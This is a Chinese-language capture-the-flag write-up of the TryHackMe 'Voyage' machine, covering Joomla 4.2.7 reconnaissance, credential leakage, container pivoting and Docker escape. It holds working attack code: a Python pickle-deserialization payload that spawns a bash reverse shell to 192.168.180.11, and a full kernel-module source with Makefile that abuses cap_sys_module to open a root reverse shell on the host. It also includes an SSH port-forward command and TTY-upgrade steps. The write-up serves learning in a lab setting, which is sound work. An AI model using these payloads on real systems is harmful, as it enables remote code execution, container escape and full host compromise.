[THM] Voyage

信息收集

首先还是进行信息收集,发现就开放三个端口,其中两个是ssh服务,一个是http服务

nmap -sV -sC -v 10.48.150.165
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-04 01:35 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
Initiating Ping Scan at 01:35
Scanning 10.48.150.165 [4 ports]
Completed Ping Scan at 01:35, 0.19s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:35
Completed Parallel DNS resolution of 1 host. at 01:35, 0.02s elapsed
Initiating SYN Stealth Scan at 01:35
Scanning 10.48.150.165 [1000 ports]
Discovered open port 22/tcp on 10.48.150.165
Discovered open port 80/tcp on 10.48.150.165
Discovered open port 2222/tcp on 10.48.150.165
Discovered open port 2222/tcp on 10.48.150.165
Completed SYN Stealth Scan at 01:35, 6.11s elapsed (1000 total ports)
Initiating Service scan at 01:35
Scanning 3 services on 10.48.150.165
Completed Service scan at 01:35, 9.70s elapsed (3 services on 1 host)
NSE: Script scanning 10.48.150.165.
Initiating NSE at 01:35
Completed NSE at 01:36, 11.10s elapsed
Initiating NSE at 01:36
Completed NSE at 01:36, 0.73s elapsed
Initiating NSE at 01:36
Completed NSE at 01:36, 0.00s elapsed
Nmap scan report for 10.48.150.165
Host is up (0.16s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 65:ae:f2:a0:03:5d:04:89:7f:a8:7b:22:b3:4c:5c:15 (ECDSA)
|_  256 ce:a0:87:b9:bc:d0:03:49:5a:c4:2f:70:5d:4b:f3:49 (ED25519)
80/tcp   open  http    Apache httpd 2.4.58 ((Ubuntu))
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/ 
| /cache/ /cli/ /components/ /includes/ /installation/ 
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 1B6942E22443109DAEA739524AB74123
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.58 (Ubuntu)
2222/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ad:4a:7e:34:01:09:f8:68:d8:f7:dd:b8:57:d4:17:cf (RSA)
|   256 8d:cd:5e:60:35:c8:65:66:3a:c5:5c:2f:ac:62:93:80 (ECDSA)
|_  256 a9:d5:16:b1:5d:4a:4c:94:3f:fd:a9:68:5f:24:ee:79 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 01:36
Completed NSE at 01:36, 0.00s elapsed
Initiating NSE at 01:36
Completed NSE at 01:36, 0.00s elapsed
Initiating NSE at 01:36
Completed NSE at 01:36, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.20 seconds
           Raw packets sent: 1263 (55.548KB) | Rcvd: 1069 (42.780KB)

那么接下来自然是主要关注的http服务,直接进去,index.html好像看不出啥东西,使用dirsearch爆破一下目录,看看有没有更多的信息,其中好像有一个administrator目录上面有提示,发现是Joomla的CMS,不过四处查看没有找到版本信息,打算使用nmap的http-enum脚本扫描网站,看看能不能找到版本的信息

这里找到目标版本是4.2.7

nmap -p 80 --script http-enum 10.48.150.165 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-04 01:56 EST
Nmap scan report for 10.48.150.165
Host is up (0.16s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /robots.txt: Robots file
|   /administrator/manifests/files/joomla.xml: Joomla version 4.2.7
|   /htaccess.txt: Joomla!
|   /README.txt: Interesting, a readme.
|   /cache/: Potentially interesting folder
|   /images/: Potentially interesting folder
|   /includes/: Potentially interesting folder
|   /modules/: Potentially interesting folder
|   /templates/: Potentially interesting folder
|_  /tmp/: Potentially interesting folder

Nmap done: 1 IP address (1 host up) scanned in 31.66 seconds

之后在浏览器搜索Joomla 4.2.7 cve的漏洞,找到一个差不多符合版本的cve的python利用脚本

这里看到泄露出了root用户的密码

后来我首先尝试是在http的登录页面进行登录,不过没有成功,后来想起来还有22和2222端口的ssh服务,这里也可以使用密码尝试,果然成功登录2222端口的ssh服务

获取UserFlag

之后是没有在本地查看到什么user.txt文件,接下来还是选择使用LinEnum.sh来枚举一下权限提升的线索,不过没啥特别收获,到/根目录下看到.docker的文件,知道这是一个docker(因为我对于docker的机器也是第一次接触到,所以从这开始基本也是参考了其他大佬的wp,才一点点摸索完这台靶机)

查看本地.bash_history记录,发现有nmap工具,然后通过ip a查看到自己的网段,然后使用nmap扫描网段

root@f5eb774507f2:/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
8: eth0@if9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:c0:a8:64:0a brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 192.168.100.10/24 brd 192.168.100.255 scope global eth0
       valid_lft forever preferred_lft forever
root@f5eb774507f2:/tmp# nmap 192.168.100.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-04 07:29 UTC
Nmap scan report for ip-192-168-100-1.ap-south-1.compute.internal (192.168.100.1)
Host is up (0.0000050s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2222/tcp open  EtherNetIP-1
5000/tcp open  upnp
MAC Address: 02:42:CC:06:07:52 (Unknown)

Nmap scan report for voyage_priv2.joomla-net (192.168.100.12)
Host is up (0.0000060s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
5000/tcp open  upnp
MAC Address: 02:42:C0:A8:64:0C (Unknown)

Nmap scan report for f5eb774507f2 (192.168.100.10)
Host is up (0.0000040s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 256 IP addresses (3 hosts up) scanned in 2.62 seconds

这里找到一台192.168.100.12下面开放了一个5000端口,然后准备端口转发到本地进行访问

ssh -CfNg -L 16666:192.168.100.12:5000 root@10.48.150.165 -p 2222

本地浏览器打开localhost:16666,看到是一个登录页面,本来打算测试一下,然后尝试爆破,不过admin和随便输入的密码居然就进去了

然后还是使用dirsearch看看有什么目录,不过最后就找到一个console目录

然后这里使用burpsuite抓包,发现他给了一个cookie,对于这个cookie一开始也是一头雾水,后来询问了ai,先是16进制,然后凭借开头的\x80\x04可以判断是pickle,然后是pickle反序列化

这里我尝试其他几个python脚本生成的,不过最后好像找了好几个,只有这个可以成功反弹到shell

#!/usr/bin/env python3
import pickle
import subprocess

class Exploit:
    def __reduce__(self):
        return (subprocess.Popen, (["bash", "-c", "bash -i >& /dev/tcp/192.168.180.11/4447 0>&1"],))
payload = pickle.dumps(Exploit())
print(payload.hex())

之后本地监听端口4447就可以拿到shell了

然后需要升级为TTY

//在反弹的shell中执行
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
//使用ctrl+Z,回到主机
stty raw -echo; fg

这样的终端会更加稳定,同时可以使用方向键,然后我们可以在这个容器中获得user.txt,第一个flag

RootFlag

之后学习到下一步是容器的逃逸,这里使用工具CDK来进行信息的枚举

发现docker拥有cap_sys_module权限,这个权限就可以加载内核模块,内核是docker和宿主机共享的,所以我们加载一个恶意的内核模块,从而实现docker的逃逸

这里先要准备一个shell.c的文件

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kmod.h>

MODULE_LICENSE("GPL");

static int shell(void){
	char *argv[] ={"/bin/bash", "-c", "bash -i >& /dev/tcp/192.168.180.11/7970 0>&1", NULL};
	static char *env[] = {
		"HOME=/",
		"TERM=linux",
		"PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };
	return call_usermodehelper(argv[0], argv, env, UMH_WAIT_PROC);
}

static int init_mod(void){
	return shell();
}

static void exit_mod(void){
	return;
}

module_init(init_mod);
module_exit(exit_mod);

然后准备一个Makefile来编译,我尝试了make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules这样动态的,不过好像在机器上make没有编译成功

后来还是uname -r查看目标系统内核版本,然后手动设置

obj-m +=shell.o
all:
	make -C /lib/modules/6.8.0-1030-aws/build M=$(PWD) modules
clean:
	make -C /lib/modules/6.8.0-1030-aws/build M=$(PWD) clean

之后都放到机器中,make成功后,会在目录中多出很多文件

先在本地打开端口监听,准备接收shell,然后要注入的恶意模块,就是insmod shell.ko

之后就可以拿到最后的root.txt的flag

总结

这台机器很多东西对于我而言都是第一次处理,第二个docker上面的pickle反序列化,这里的利用代码都是看的其他大佬的wp,pickle反序列化只是以前学习过理论层面的知识,不过真遇上了还是一头雾水,还是学到了很多新东西,接触到docker逃逸和pickle反序列化,希望下一次再遇到能自己做出来,能有更深刻的理解